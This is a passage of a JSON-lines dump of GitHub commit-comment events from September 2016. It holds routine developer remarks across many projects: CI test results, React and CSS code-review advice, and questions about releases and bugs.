href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ec92564b06f1714cc9de355b6c174cc6e1fda54-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-12T17:19:17Z"}
{"id":"4550648939","type":"CommitCommentEvent","actor":{"login":"mikiones"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":18988399,"position":null,"line":null,"path":null,"commit_id":"e45800f5ab637a1f33bd3f21187e96edf61bd9d9","created_at":"2016-09-12T17:19:57Z","updated_at":"2016-09-12T17:19:57Z","body":"check if you have target asiged on that creep. amor if flag still exists "}},"created_at":"2016-09-12T17:19:57Z"}
{"id":"4550651418","type":"CommitCommentEvent","actor":{"login":"friedger"},"repo":{"name":"gdg-x/frisbee"},"payload":{"comment":{"id":18988404,"position":null,"line":null,"path":null,"commit_id":"454ea6d0cdf92a3d5a58f37bb7f0e448746ab0e1","created_at":"2016-09-12T17:20:26Z","updated_at":"2016-09-12T17:20:26Z","body":"Oh, wow! "}},"created_at":"2016-09-12T17:20:26Z"}
{"id":"4550654637","type":"CommitCommentEvent","actor":{"login":"maechler"},"repo":{"name":"linked-swissbib/hydra-swissbib.ch"},"payload":{"comment":{"id":18988414,"position":null,"line":null,"path":null,"commit_id":"9e788a61f04c0bf446d703f48fabf878f3541fb8","created_at":"2016-09-12T17:21:02Z","updated_at":"2016-09-12T17:21:02Z","body":"@guenterh Im Framework API-Platform sind die Dateien bewusst versioniert, ich habe das deshalb bis jetzt nicht hinterfragt (https://github.com/api-platform/api-platform/blob/master/.gitignore). Ich müsste mir das genauer ansehen.\r\n\r\nBei einem Deployment solltest du jeweils nur ein `composer install` und kein `composer update` machen. Ansonsten laufen wir Gefahr, dass wir eine Abhängigkeit updaten, die Probleme verursacht. Wir werden die Abhängigkeiten laufend lokal updaten, testen und dann pushen."}},"created_at":"2016-09-12T17:21:02Z"}
{"id":"4550654737","type":"CommitCommentEvent","actor":{"login":"Taapat"},"repo":{"name":"Taapat/enigma2-openpli-vuplus"},"payload":{"comment":{"id":18988415,"position":null,"line":null,"path":null,"commit_id":"a0c5b79f765b9c8314024d55ca9910e3e981959b","created_at":"2016-09-12T17:21:03Z","updated_at":"2016-09-12T17:21:03Z","body":"openMixer() return open( AUDIO_DEV, O_RDWR ), so we need fd not only openMixer().\r\n\r\nI have problems on vuplus only when leaving standby. Why use it on each volumeToggleMute()?"}},"created_at":"2016-09-12T17:21:03Z"}
{"id":"4550654783","type":"CommitCommentEvent","actor":{"login":"zhewenw"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":18988416,"position":44,"line":33,"path":"ui/app.jsx","commit_id":"c9be8d8481a246f5d18c281876413d3419eb1983","created_at":"2016-09-12T17:21:04Z","updated_at":"2016-09-12T17:21:04Z","body":"Should I write all of my functions in this way? Or is there a rule of thumb?\nᐧ\n\nOn Sat, Sep 10, 2016 at 2:57 PM, Adam Wexler <notifications@github.com>\nwrote:\n\n> You should write this function such that you don't have to bind the\n> function in the constructor:\n>\n> handleChange = (event) => {\n>   this.setState({ keyword: event.target.value });\n> }\n>\n> instead of\n>\n> this.handleChange = this.handleChange.bind(this);\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://urldefense.proofpoint.com/v2/url?u=https-3A__github.com_zhewenw_react-2Dstarter_commit_c9be8d8481a246f5d18c281876413d3419eb1983-23commitcomment-2D18975140&d=DQMFaQ&c=clK7kQUTWtAVEOVIgvi0NU5BOUHhpN0H8p7CSfnc_gI&r=L_ADWr4Krk3FRtAzAxwK-g&m=mv3_jy-sZJsGe8dpcYr_8ABEsojgSmYFmeU9Wl7KOZA&s=PcLqdnVUYqjClKnmxImlGRE1bfkGfHw9-msPArkGjsU&e=>,\n> or mute the thread\n> <https://urldefense.proofpoint.com/v2/url?u=https-3A__github.com_notifications_unsubscribe-2Dauth_AKDN8gSPON94cE4gWHSuRyUKhgLeH8dnks5qoyfTgaJpZM4J51s4&d=DQMFaQ&c=clK7kQUTWtAVEOVIgvi0NU5BOUHhpN0H8p7CSfnc_gI&r=L_ADWr4Krk3FRtAzAxwK-g&m=mv3_jy-sZJsGe8dpcYr_8ABEsojgSmYFmeU9Wl7KOZA&s=x_T0K3NLX_XyTzakErXOYkkt1fYuUn3zNln0NFtkRn0&e=>\n> .\n>\n\n\n\n-- \nSincerely,\n\nJason Wang\n*University of Southern California '17 *\n"}},"created_at":"2016-09-12T17:21:04Z"}
{"id":"4550655961","type":"CommitCommentEvent","actor":{"login":"friedger"},"repo":{"name":"gdg-x/frisbee"},"payload":{"comment":{"id":18988419,"position":null,"line":null,"path":null,"commit_id":"454ea6d0cdf92a3d5a58f37bb7f0e448746ab0e1","created_at":"2016-09-12T17:21:17Z","updated_at":"2016-09-12T17:21:17Z","body":"I was playing with the crowdin gradle plug-in. Looks good, but haven't figured out yet how to delete strings "}},"created_at":"2016-09-12T17:21:17Z"}
{"id":"4550657034","type":"CommitCommentEvent","actor":{"login":"mikiones"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":18988421,"position":null,"line":null,"path":null,"commit_id":"e45800f5ab637a1f33bd3f21187e96edf61bd9d9","created_at":"2016-09-12T17:21:28Z","updated_at":"2016-09-12T17:21:28Z","body":"like if thy trying   go to source and it is blocked.. "}},"created_at":"2016-09-12T17:21:28Z"}
{"id":"4550657814","type":"CommitCommentEvent","actor":{"login":"JavaJimbo"},"repo":{"name":"JavaJimbo/RC-Servo"},"payload":{"comment":{"id":18988423,"position":null,"line":null,"path":null,"commit_id":"cc12ed5ae209350544b24fb352fa5d302e5fcdee","created_at":"2016-09-12T17:21:37Z","updated_at":"2016-09-12T17:21:37Z","body":"Created for Midnight Zoo."}},"created_at":"2016-09-12T17:21:37Z"}
{"id":"4550658126","type":"CommitCommentEvent","actor":{"login":"friedger"},"repo":{"name":"gdg-x/frisbee"},"payload":{"comment":{"id":18988424,"position":null,"line":null,"path":null,"commit_id":"454ea6d0cdf92a3d5a58f37bb7f0e448746ab0e1","created_at":"2016-09-12T17:21:40Z","updated_at":"2016-09-12T17:21:40Z","body":"Is it enough to upload a new strings.xml?"}},"created_at":"2016-09-12T17:21:40Z"}
{"id":"4550659818","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18988431,"position":null,"line":null,"path":null,"commit_id":"5ec92564b06f1714cc9de355b6c174cc6e1fda54","created_at":"2016-09-12T17:21:57Z","updated_at":"2016-09-12T17:21:57Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1186 of 1186 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ec92564b06f1714cc9de355b6c174cc6e1fda54-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ec92564b06f1714cc9de355b6c174cc6e1fda54-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ec92564b06f1714cc9de355b6c174cc6e1fda54-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.98%25-green.svg)</a>\n"}},"created_at":"2016-09-12T17:21:57Z"}
{"id":"4550663616","type":"CommitCommentEvent","actor":{"login":"hcook"},"repo":{"name":"ucb-bar/rocket-chip"},"payload":{"comment":{"id":18988440,"position":null,"line":null,"path":null,"commit_id":"66e9f027e0ccfe6e423a62918c3d40e38eb436bd","created_at":"2016-09-12T17:22:40Z","updated_at":"2016-09-12T17:22:40Z","body":"Haha I was just thinking about adding this..."}},"created_at":"2016-09-12T17:22:40Z"}
{"id":"4550664236","type":"CommitCommentEvent","actor":{"login":"ricardobrandao"},"repo":{"name":"ayende/ravendb"},"payload":{"comment":{"id":18988443,"position":null,"line":null,"path":null,"commit_id":"bc9c41600e0ac8fee84be836602f868faa213cac","created_at":"2016-09-12T17:22:47Z","updated_at":"2016-09-12T17:22:47Z","body":"@ayende is this going out with 3.5 RTM?"}},"created_at":"2016-09-12T17:22:47Z"}
{"id":"4550665094","type":"CommitCommentEvent","actor":{"login":"fernandosouza"},"repo":{"name":"metal/metal.js"},"payload":{"comment":{"id":18988447,"position":null,"line":null,"path":null,"commit_id":"dad80412eeba242b70380fdc726708b45b8e1748","created_at":"2016-09-12T17:22:57Z","updated_at":"2016-09-12T17:22:57Z","body":"I get it, @mairatma. Thx."}},"created_at":"2016-09-12T17:22:57Z"}
{"id":"4550666166","type":"CommitCommentEvent","actor":{"login":"Isopod"},"repo":{"name":"mpv-player/mpv"},"payload":{"comment":{"id":18988452,"position":null,"line":null,"path":null,"commit_id":"5bcb22beea14bb48a84c610425d5693e0305e434","created_at":"2016-09-12T17:23:11Z","updated_at":"2016-09-12T17:23:11Z","body":"I think you have to use `best[protocol!=http_dash_segments]`. But this doesn't give you the same quality as `bestvideo+bestaudio`, for example you might only get 720p instead of 1080p and less efficient codecs with more compression artifacts. This is exactly what I was complaining about. The silly part is that `bestvideo+bestaudio` works in the old version. This is why I'm still on v0.18.0."}},"created_at":"2016-09-12T17:23:11Z"}
{"id":"4550668891","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"nikolay-gavrilov/lemon-school"},"payload":{"comment":{"id":18988462,"position":5,"line":5,"path":"6/index.html","commit_id":"addd76519b35b3c36190461f31ae71cfd1e20c01","created_at":"2016-09-12T17:23:42Z","updated_at":"2016-09-12T17:23:42Z","body":"зачем это?"}},"created_at":"2016-09-12T17:23:42Z"}
{"id":"4550669047","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"nikolay-gavrilov/lemon-school"},"payload":{"comment":{"id":18988463,"position":14,"line":14,"path":"6/index.html","commit_id":"addd76519b35b3c36190461f31ae71cfd1e20c01","created_at":"2016-09-12T17:23:44Z","updated_at":"2016-09-12T17:23:44Z","body":"а это зачем?"}},"created_at":"2016-09-12T17:23:44Z"}
{"id":"4550669285","type":"CommitCommentEvent","actor":{"login":"someonenitr"},"repo":{"name":"jpillora/cloud-torrent"},"payload":{"comment":{"id":18988464,"position":null,"line":null,"path":null,"commit_id":"210e609851255b848f61b2d45f7cdf401dd91698","created_at":"2016-09-12T17:23:46Z","updated_at":"2016-09-12T17:23:46Z","body":"Isn't there any alternative to heroku app??? if yes pls deploy this one in that site and give me link"}},"created_at":"2016-09-12T17:23:46Z"}
{"id":"4550670135","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"nikolay-gavrilov/lemon-school"},"payload":{"comment":{"id":18988465,"position":17,"line":17,"path":"6/index.html","commit_id":"addd76519b35b3c36190461f31ae71cfd1e20c01","created_at":"2016-09-12T17:23:55Z","updated_at":"2016-09-12T17:23:55Z","body":"окей, ну а где сам файл?"}},"created_at":"2016-09-12T17:23:55Z"}
{"id":"4550670892","type":"CommitCommentEvent","actor":{"login":"weili905906480"},"repo":{"name":"chrisbanes/PhotoView"},"payload":{"comment":{"id":18988469,"position":23,"line":21,"path":"README.md","commit_id":"b5c22a77100d6e89177fe5d692a07a843c2643b1","created_at":"2016-09-12T17:24:05Z","updated_at":"2016-09-12T17:24:05Z","body":"compile 'com.github.chrisbanes:PhotoView:1.3.0'"}},"created_at":"2016-09-12T17:24:05Z"}
{"id":"4550670910","type":"CommitCommentEvent","actor":{"login":"frankleonrose"},"repo":{"name":"things-nyc/arduino-lmic"},"payload":{"comment":{"id":18988470,"position":null,"line":null,"path":null,"commit_id":"6cc4e21bf5e304a40e3a01edd4e4ca751c8f95ea","created_at":"2016-09-12T17:24:06Z","updated_at":"2016-09-12T17:24:06Z","body":"That sounds perfect. Agreed on both moving to project_config and supporting 'canned' includes or selectable sets of parameters."}},"created_at":"2016-09-12T17:24:06Z"}
{"id":"4550670960","type":"CommitCommentEvent","actor":{"login":"zhewenw"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":18988471,"position":53,"line":42,"path":"ui/app.jsx","commit_id":"c9be8d8481a246f5d18c281876413d3419eb1983","created_at":"2016-09-12T17:24:07Z","updated_at":"2016-09-12T17:24:07Z","body":"renderResult = (item, i) => (\n  <button key={i}>{item.Title}</button>\n);\n\n\nwhy is this wrap inside parenthesis instead of brackets?\nᐧ\n\nOn Sat, Sep 10, 2016 at 3:03 PM, Adam Wexler <notifications@github.com>\nwrote:\n\n> There are a couple changes I would make to how you wrote your function:\n>\n> renderResult = (item, i) => (\n>   <button key={i}>{item.Title}</button>\n> );\n>\n> renderResults() {\n>   if (!this.state.displayResults) return null;\n>   return this.state.query.map(this.renderResult);\n> }\n>\n> First, rather than wrapping your entire function body in an if statement,\n> just exit early. Next, it's generally bad practice to use anonymous\n> functions in a map because they create a closure (which is sometimes\n> useful, but in this case unnecessary).\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://urldefense.proofpoint.com/v2/url?u=https-3A__github.com_zhewenw_react-2Dstarter_commit_c9be8d8481a246f5d18c281876413d3419eb1983-23commitcomment-2D18975169&d=DQMFaQ&c=clK7kQUTWtAVEOVIgvi0NU5BOUHhpN0H8p7CSfnc_gI&r=L_ADWr4Krk3FRtAzAxwK-g&m=VBKYmWRxGsBhvdRiIDNYWkDtU4cwFvK6MQymbEPR0dI&s=YGMWbAvTEtMgAZMfd3LPU3d8SF2llzUY7AebMNmRopU&e=>,\n> or mute the thread\n> <https://urldefense.proofpoint.com/v2/url?u=https-3A__github.com_notifications_unsubscribe-2Dauth_AKDN8rXN1fhT4R7WH7DDQRfhxi4mdZGEks5qoyk4gaJpZM4J51s4&d=DQMFaQ&c=clK7kQUTWtAVEOVIgvi0NU5BOUHhpN0H8p7CSfnc_gI&r=L_ADWr4Krk3FRtAzAxwK-g&m=VBKYmWRxGsBhvdRiIDNYWkDtU4cwFvK6MQymbEPR0dI&s=S36R-fDmipT3JQoaE7NzD7eqFP5xe1jd8Cc7qFt0rdE&e=>\n> .\n>\n\n\n\n-- \nSincerely,\n\nJason Wang\n*University of Southern California '17 *\n"}},"created_at":"2016-09-12T17:24:07Z"}
{"id":"4550671974","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"psylone/train_manager"},"payload":{"comment":{"id":18988477,"position":29,"line":13,"path":"app/views/trains/_form.html.erb","commit_id":"630a756dc2f91d691eca016aa229732bccbab196","created_at":"2016-09-12T17:24:18Z","updated_at":"2016-09-12T17:24:18Z","body":"Хорошо бы включать пустое значение, чтобы можно было снять поезд с маршрута."}},"created_at":"2016-09-12T17:24:18Z"}
{"id":"4550672395","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"nikolay-gavrilov/lemon-school"},"payload":{"comment":{"id":18988480,"position":15,"line":15,"path":"6/index.html","commit_id":"addd76519b35b3c36190461f31ae71cfd1e20c01","created_at":"2016-09-12T17:24:23Z","updated_at":"2016-09-12T17:24:23Z","body":"`maximum-scale=1` - плохо, нужно давать пользователю возможность изменять масштаб"}},"created_at":"2016-09-12T17:24:23Z"}
{"id":"4550674847","type":"CommitCommentEvent","actor":{"login":"nicolaViola"},"repo":{"name":"nicolaViola/slotmachine"},"payload":{"comment":{"id":18988485,"position":null,"line":null,"path":null,"commit_id":"23bfa002990ee8c18958aa2cb6cce73d4d846792","created_at":"2016-09-12T17:24:51Z","updated_at":"2016-09-12T17:24:51Z","body":"x"}},"created_at":"2016-09-12T17:24:51Z"}
{"id":"4550676695","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"nikolay-gavrilov/lemon-school"},"payload":{"comment":{"id":18988487,"position":49,"line":49,"path":"7/css/main.css","commit_id":"addd76519b35b3c36190461f31ae71cfd1e20c01","created_at":"2016-09-12T17:25:13Z","updated_at":"2016-09-12T17:25:13Z","body":"зачем вендорный префикс? http://caniuse.com/#search=transition"}},"created_at":"2016-09-12T17:25:13Z"}
{"id":"4550678680","type":"CommitCommentEvent","actor":{"login":"cyberblast"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":18988494,"position":null,"line":null,"path":null,"commit_id":"e45800f5ab637a1f33bd3f21187e96edf61bd9d9","created_at":"2016-09-12T17:25:35Z","updated_at":"2016-09-12T17:25:35Z","body":"no, it happened on multiple borders and was over once this fix was active"}},"created_at":"2016-09-12T17:25:35Z"}
{"id":"4550680160","type":"CommitCommentEvent","actor":{"login":"blerner"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18988499,"position":null,"line":null,"path":null,"commit_id":"0247aa65275b8b3f505fd29044f3a0d4f14c26ba","created_at":"2016-09-12T17:25:52Z","updated_at":"2016-09-12T17:25:52Z","body":"In all seriousness -- this is cute to the point of cutesy: while this might be fun for young kids, the first time they hit run, do we really want this for high-school and college students for the entire semester??"}},"created_at":"2016-09-12T17:25:52Z"}
{"id":"4550680191","type":"CommitCommentEvent","actor":{"login":"sndnvaps"},"repo":{"name":"multirom-aries/android_device_xiaomi_aries"},"payload":{"comment":{"id":18988500,"position":null,"line":null,"path":null,"commit_id":"6ece8e7c198afe8df5fe402eff35e98109a94677","created_at":"2016-09-12T17:25:52Z","updated_at":"2016-09-12T17:25:52Z","body":"@akorshun i use   LD_SHIM_LIBS\r\nyou can checkout this line \r\n https://github.com/multirom-aries/android_device_xiaomi_aries/blob/cm-14.0-caf/init.aries.rc#L28\r\n\r\nbut still get the bootloop, it seem's system.ui is crash ,\r\n"}},"created_at":"2016-09-12T17:25:52Z"}
{"id":"4550681287","type":"CommitCommentEvent","actor":{"login":"DanielleFarrant"},"repo":{"name":"DanielleFarrant/Lab-meeting-9-12"},"payload":{"comment":{"id":18988504,"position":null,"line":null,"path":null,"commit_id":"205086ced3cee21a2b99b99ce72d0d26168a7fb7","created_at":"2016-09-12T17:26:06Z","updated_at":"2016-09-12T17:26:06Z","body":"bgdb"}},"created_at":"2016-09-12T17:26:06Z"}
{"id":"4550681884","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18988507,"position":null,"line":null,"path":null,"commit_id":"ff12939bee168cd9aff19d766ecedb0e595bb2b0","created_at":"2016-09-12T17:26:12Z","updated_at":"2016-09-12T17:26:12Z","body":"fast-forwarding develop-2.2 to borshop-integration-1477-cuttlefish-commented = 61fb9c4a"}},"created_at":"2016-09-12T17:26:12Z"}
{"id":"4550683544","type":"CommitCommentEvent","actor":{"login":"yang-g"},"repo":{"name":"grpc/grpc"},"payload":{"comment":{"id":18988514,"position":4,"line":743,"path":"src/core/lib/iomgr/tcp_server_posix.c","commit_id":"9275d4067cfd9233edf2ae9a0fe1255c8c730f19","created_at":"2016-09-12T17:26:29Z","updated_at":"2016-09-12T17:26:29Z","body":"The method was added to shutdown listening fds early so that a client with many channels that keeps reconnecting will not prevent server from shutdown. I am sure what you said is right. But the deactivated_all_ports only continues when the shutdown bit is turned to true, which translates to refcount == 0. What did I miss? Thanks."}},"created_at":"2016-09-12T17:26:29Z"}
{"id":"4550691046","type":"CommitCommentEvent","actor":{"login":"bashor"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18988532,"position":null,"line":null,"path":null,"commit_id":"2a6e43c2255e3942ea67d05643ad0171e8098fad","created_at":"2016-09-12T17:27:53Z","updated_at":"2016-09-12T17:27:53Z","body":"@ilya-g, yes, it should be removed."}},"created_at":"2016-09-12T17:27:53Z"}
{"id":"4550695371","type":"CommitCommentEvent","actor":{"login":"offbored"},"repo":{"name":"scala-lms/tutorials"},"payload":{"comment":{"id":18988534,"position":null,"line":null,"path":null,"commit_id":"5d413de25ab4fc0919c97d7f6ced497597681263","created_at":"2016-09-12T17:28:41Z","updated_at":"2016-09-12T17:28:41Z","body":"I'm going through the dsldiss videos and hit this as a stopper. I can likely muddle through without this code working, or even downgrade to a previous lms version, but if you can provide some general direction/guidance, I'd take a stab at repair. Fair warning, I'm somewhat new to Scala.\r\n\r\nAlso, if you don't mind sharing, I saw you started work on an lms-clean. Was the motivation just to eliminate the Rep type (and I guess any concomitant implicits)? I actually found the explicit use of an abstract type to be a useful part of the pattern that helped create some bright lines (and sort of forced you to acknowledge and remember that you were working within the context of an abstract representation). But I've only just started thinking about this sort of approach, so I'm sure there are things I'm missing.\r\n\r\nActually there has to be something I'm missing since the pattern falls apart in my mind if there's no way to explicitly determine and use both the DSL & IR types in the compiler/staging phase."}},"created_at":"2016-09-12T17:28:41Z"}
{"id":"4550701909","type":"CommitCommentEvent","actor":{"login":"kerphi"},"repo":{"name":"Inist-CNRS/ezmaster"},"payload":{"comment":{"id":18988559,"position":4,"line":133,"path":"test/testFakeapp-ezmasterized.js","commit_id":"ef6e044b621cacad6de612a21e3ed24e72652cbd","created_at":"2016-09-12T17:29:53Z","updated_at":"2016-09-12T17:29:53Z","body":"je ne suis pas certain que ce soit stable car qd on lance ezmaster, on ne le lance pas forcement avec la var d'env DEBUG positionnée ... qd on lance les tests c'est cependant souvent le cas. Par sécurité, je serai peut-être  pour retirer ce expect ?"}},"created_at":"2016-09-12T17:29:53Z"}
{"id":"4550702260","type":"CommitCommentEvent","actor":{"login":"tabacitu"},"repo":{"name":"se1exin/CRUD"},"payload":{"comment":{"id":18988560,"position":null,"line":null,"path":null,"commit_id":"8430d94d5e083f8e7d05f942e13511ae844816ae","created_at":"2016-09-12T17:29:56Z","updated_at":"2016-09-12T17:29:56Z","body":"Of course, no rush.\r\n\r\nHmm... I did not think ahead about how to display different types of data. But to start with just dumping the value will be fine, I think. \r\n\r\nRandom thougths:\r\n- With images we might have different problems on our hands (image has been deleted from the disk);\r\n- For relationships we might use [column_types](https://laravel-backpack.readme.io/docs/crud-columns-types) or a similar functionality;\r\n\r\nI'll think about it some more and come back to you... \r\n\r\nCheers!"}},"created_at":"2016-09-12T17:29:56Z"}
{"id":"4550702552","type":"CommitCommentEvent","actor":{"login":"okanikec"},"repo":{"name":"okanikec/nodjes1"},"payload":{"comment":{"id":18988562,"position":null,"line":null,"path":null,"commit_id":"4d8160c7f6b26988bab70facd57943ed1f3c3bb4","created_at":"2016-09-12T17:29:59Z","updated_at":"2016-09-12T17:29:59Z","body":"Hello"}},"created_at":"2016-09-12T17:29:59Z"}
{"id":"4550710020","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18988580,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T17:31:17Z","updated_at":"2016-09-12T17:31:17Z","body":"> Next step is to ust move the 5 point star+emoticon to plugin\r\n\r\nI would wait a little bit with this. A usable question object prototype might not be so far away, if we agree to not refactor the database."}},"created_at":"2016-09-12T17:31:17Z"}
{"id":"4550713722","type":"CommitCommentEvent","actor":{"login":"kerphi"},"repo":{"name":"Inist-CNRS/ezmaster"},"payload":{"comment":{"id":18988585,"position":null,"line":null,"path":null,"commit_id":"aed8dca28682a787b7f38c8ed12c55b3777ddaf2","created_at":"2016-09-12T17:31:54Z","updated_at":"2016-09-12T17:31:54Z","body":"Merci pour le nettoyage :blush: "}},"created_at":"2016-09-12T17:31:54Z"}
{"id":"4550722995","type":"CommitCommentEvent","actor":{"login":"kumar303"},"repo":{"name":"mozilla/web-ext"},"payload":{"comment":{"id":18988604,"position":7,"line":30,"path":"src/program.js","commit_id":"5a5e0a45133b9f96057e45f5ec2a3ecefdbac579","created_at":"2016-09-12T17:33:39Z","updated_at":"2016-09-12T17:33:39Z","body":"does this still work if one does:\r\n````\r\n./bin/web-ext ...\r\n````\r\n?"}},"created_at":"2016-09-12T17:33:39Z"}
{"id":"4550723982","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"nikolay-gavrilov/lemon-school"},"payload":{"comment":{"id":18988607,"position":55,"line":55,"path":"7/css/main.css","commit_id":"addd76519b35b3c36190461f31ae71cfd1e20c01","created_at":"2016-09-12T17:33:50Z","updated_at":"2016-09-12T17:33:50Z","body":"Это противоречит `display: inline-block`. Элемент при наличии float получает `display:block`.\r\nТо есть, указав элементу, у которого `display:inline` свойство `float: left/right`, мы автоматически сделаем его блочным. В частности, для него будут работать `width/height`. - https://learn.javascript.ru/float"}},"created_at":"2016-09-12T17:33:50Z"}
{"id":"4550736928","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"nikolay-gavrilov/lemon-school"},"payload":{"comment":{"id":18988640,"position":70,"line":70,"path":"6/css/main.css","commit_id":"addd76519b35b3c36190461f31ae71cfd1e20c01","created_at":"2016-09-12T17:36:13Z","updated_at":"2016-09-12T17:36:13Z","body":"`transition` нужно вешать на блок без ховера, иначе анимация будет отрабатывать только при наведении, в твоем случае, когда курсор \"ушел\" от элемента, анимация не работает"}},"created_at":"2016-09-12T17:36:13Z"}
{"id":"4550737958","type":"CommitCommentEvent","actor":{"login":"gwvo"},"repo":{"name":"google/flatbuffers"},"payload":{"comment":{"id":18988641,"position":1,"line":1,"path":"net/FlatBuffers/IFlatbufferObject .cs","commit_id":"8e3fa336eb894317cd828163d1677265da3a3483","created_at":"2016-09-12T17:36:23Z","updated_at":"2016-09-12T17:36:23Z","body":"This was fixed in https://github.com/google/flatbuffers/pull/4020"}},"created_at":"2016-09-12T17:36:23Z"}
{"id":"4550738101","type":"CommitCommentEvent","actor":{"login":"sayterdarkwynd"},"repo":{"name":"NotMrFlibble/FrackinUniverse"},"payload":{"comment":{"id":18988644,"position":null,"line":null,"path":null,"commit_id":"a328c7162a4ceaec9e0306e282fa01132f9e7c9b","created_at":"2016-09-12T17:36:25Z","updated_at":"2016-09-12T17:36:25Z","body":"amaaazing! good work!"}},"created_at":"2016-09-12T17:36:25Z"}
{"id":"4550742181","type":"CommitCommentEvent","actor":{"login":"afinnell"},"repo":{"name":"afinnell/vinyl-fs"},"payload":{"comment":{"id":18988656,"position":null,"line":null,"path":null,"commit_id":"2a022ecae6a4e954ad198b5acf8ff5400ccb2ff1","created_at":"2016-09-12T17:37:12Z","updated_at":"2016-09-12T17:37:12Z","body":"Didn't see how to add another commit. The opts on line 22 should be opt (not plural)"}},"created_at":"2016-09-12T17:37:12Z"}
{"id":"4550743853","type":"CommitCommentEvent","actor":{"login":"ayende"},"repo":{"name":"ayende/ravendb"},"payload":{"comment":{"id":18988664,"position":null,"line":null,"path":null,"commit_id":"bc9c41600e0ac8fee84be836602f868faa213cac","created_at":"2016-09-12T17:37:31Z","updated_at":"2016-09-12T17:37:31Z","body":"Yes\n\nOn Sep 12, 2016 8:22 PM, \"Ricardo Brandão\" <notifications@github.com> wrote:\n\n> @ayende <https://github.com/ayende> is this going out with 3.5 RTM?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ayende/ravendb/commit/bc9c41600e0ac8fee84be836602f868faa213cac#commitcomment-18988443>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAHIs1laZA6PUfAtsv2gtjEZ3xE916HZks5qpYpogaJpZM4J60q9>\n> .\n>\n"}},"created_at":"2016-09-12T17:37:31Z"}
{"id":"4550745432","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"nikolay-gavrilov/lemon-school"},"payload":{"comment":{"id":18988667,"position":null,"line":null,"path":null,"commit_id":"addd76519b35b3c36190461f31ae71cfd1e20c01","created_at":"2016-09-12T17:37:49Z","updated_at":"2016-09-12T17:37:49Z","body":"подразумевалось, что бэкграунды занимают всю ширину страницы, контент же находится по середине с фиксированной шириной.\r\nв целом, очень качественная работа"}},"created_at":"2016-09-12T17:37:49Z"}
{"id":"4550748783","type":"CommitCommentEvent","actor":{"login":"malte0811"},"repo":{"name":"malte0811/ImmersiveEngineering"},"payload":{"comment":{"id":18988674,"position":null,"line":null,"path":null,"commit_id":"3a0031a971e809056cdefe69c985ce56d2efafa4","created_at":"2016-09-12T17:38:26Z","updated_at":"2016-09-12T17:38:26Z","body":"@BluSunrize are you happy with this?"}},"created_at":"2016-09-12T17:38:26Z"}
{"id":"4550752972","type":"CommitCommentEvent","actor":{"login":"jimmyt857"},"repo":{"name":"uWebSockets/refactor"},"payload":{"comment":{"id":18988679,"position":22,"line":22,"path":"WebSocket.h","commit_id":"d19bbf9232e7292abde44a1b0bba608d9d0a5833","created_at":"2016-09-12T17:39:11Z","updated_at":"2016-09-12T17:39:11Z","body":"One really minor thing- because write will call unmask_inplace (depending on agent type), you need to add 3 to the buffer size so that when the unmask function rounds up to 4 you don't go over."}},"created_at":"2016-09-12T17:39:11Z"}
{"id":"4550753081","type":"CommitCommentEvent","actor":{"login":"SnapperRy"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18988680,"position":null,"line":null,"path":null,"commit_id":"4164e0cf88745a85b5b11587471b047fe0077fbb","created_at":"2016-09-12T17:39:12Z","updated_at":"2016-09-12T17:39:12Z","body":"[Source](http://wow.gamepedia.com/Patch_3.3.0_%28undocumented_changes%29#cite_ref-8)."}},"created_at":"2016-09-12T17:39:12Z"}
